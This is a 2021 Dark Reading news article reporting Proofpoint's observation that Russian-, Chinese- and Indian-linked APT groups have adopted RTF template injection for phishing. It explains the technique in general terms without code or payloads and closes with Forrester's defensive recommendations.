APT Groups Adopt New Phishing Method. Will Cybercriminals Follow?

APT actors from Russia, China, and India have been observed using the RTF-template injection technique that researchers say is poised for wider adoption.

Kelly Sheridan, Former Senior Editor, Dark Reading

December 1, 2021

5 Min Read
man fishing in a river
Source: FORGET Patrick via Alamy Stock Photo

APT groups from Russia, China, and India have adopted a new and easily implemented phishing method throughout the second and third quarters of this year that researchers say is poised for broader adoption among cybercriminals as well.

The Proofpoint research team observed growing adoption of the so-called RTF (rich text format)-template injection technique among APT groups from February 2021 through April 2021. While the tactic isn't necessarily new — other security researchers spotted it as early as January — today's findings mark a renewed surge of the attack technique.

RTF template injection is a technique in which an RTF file with decoy content can be changed to retrieve content hosted at an external URL when the RTF file is opened. By altering document formatting properties of an RTF file, the attacker can weaponize it to access remote content by specifying a URL resource instead of an accessible file destination, researchers wrote in a blog.

In the past, use of embedded malicious RTF objects has been well-documented as a vector for delivering malware using RTFs, they noted. This technique is more simplistic and, in some ways, more effective for delivering remote payloads compared with earlier documented methods.

"RTFs are inherently extremely flexible file types that in their file architecture accommodate a lot of objects and destination fields where a threat actor can store a malicious URL or file to retrieve a remote payload," explains Sherrod DeGrippo, vice president of threat research & detection at Proofpoint.

Further, RTF files store their properties as plaintext strings within the bytes of a file to maintain file formatting across document editors, she adds.

"This means that weaponizing a file is as simple as creating a lure file in a document editor and opening up your hex editor and replacing certain file bytes with the bytes representing a malicious URL destination," DeGrippo says.

In their writeup, researchers say it's "trivial" to alter the bytes of an RTF file to insert a template control word destination including a URL resource. This would allow the RTF file to retrieve a URL resource as a destination, rather than a file, as the RTF structure intends. They note this method can be used in .rtf and .doc.rtf files, enabling successful retrieval of remote payloads.

The sample RTF template injection files Proofpoint analyzed currently have a lower detection rate among public antivirus engines compared with the well-known Office-based template injection technique, DeGrippo notes.

When they open the phishing attachment, a victim of one of these attacks will briefly see a "contacting the server for information" message, which they would not see for a normal Word or RTF file. If the control Word group was not properly bracketed, an error message may appear, but this does not happen in all cases.

A New Trend Among APT Groups
Proofpoint has observed three primary variations of this tactic in the wild among APT groups, DeGrippo says, but the three groups using it abuse the core functionality in the same way.

Template injection RTF files attributable to the APT group DoNot team, suspected of alignment with Indian-state interests, were spotted through July 8, 2021. RTF files "likely attributable" to a Chinese-related APT attacker called TA423 were seen as recently as Sept. 29 and targeted organizations with links to Malaysian deep-water energy exploration, researchers noted. Other than this, they do not have information to share on targeting patterns.

Later on, they observed the APT Gamaredon, linked to the Russian Federal Security Service (FSB), using RTF template injection files in attacks that used Ukrainian government file lures on Oct. 5, 2021. This technique appeals to APT groups because it's relatively easy and stealthy.

"APT actors, despite the 'advanced' designation, if they are doing their job well will exert the least amount of resources and sophistication necessary to gain access to organizations," says DeGrippo. This prevents the attackers from exposing their sophisticated tools if they're caught, which would cause a bigger operational disruption in terms of replacing technical capabilities.

The advantage of RTF template injection is both its ease of weaponization and the reality that many organizations don't block RTF files by default, she continues. "They are part of typical business operations," she adds.

Proofpoint believes this technique has been previously used in a limited capacity by crimeware attackers. However, they say the ease of weaponization will likely attract low-sophistication attackers and ultimately drive instances of this technique in the wild. It is possible attackers will bring RTF template injection into their existing phishing toolkit as a means of increasing their success amid ongoing operations, DeGrippo says.

Fighting Against Phish
In a new report, Forrester analysts detail the characteristics of successful phishing attacks and share their advice for organizations seeking to up their defensive strategies.

"Even trained cybersecurity pros can be victimized by well-crafted phishing emails, so it's not surprising that users don't recognize every attack aimed at them," they wrote.

Their recommendations include implementing technical controls, such as email content filtering and email authentication, to protect users. Analysts also advise providing ongoing security awareness training to teach users not only how to recognize suspicious emails but also how to handle them after they're spotted. Test employees regularly and measure their performance, they advise.

Still, it's smart to plan for technical human failure. Some emails will slip past your defenses; you can limit the impact of an attack with browser isolation technology, multifactor authentication, and a regularly reviewed incident response plan.

About the Author(s)

Kelly Sheridan

Former Senior Editor, Dark Reading

Kelly Sheridan was formerly a Staff Editor at Dark Reading, where she focused on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial services. Sheridan earned her BA in English at Villanova University. You can follow her on Twitter @kellymsheridan.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like

More Insights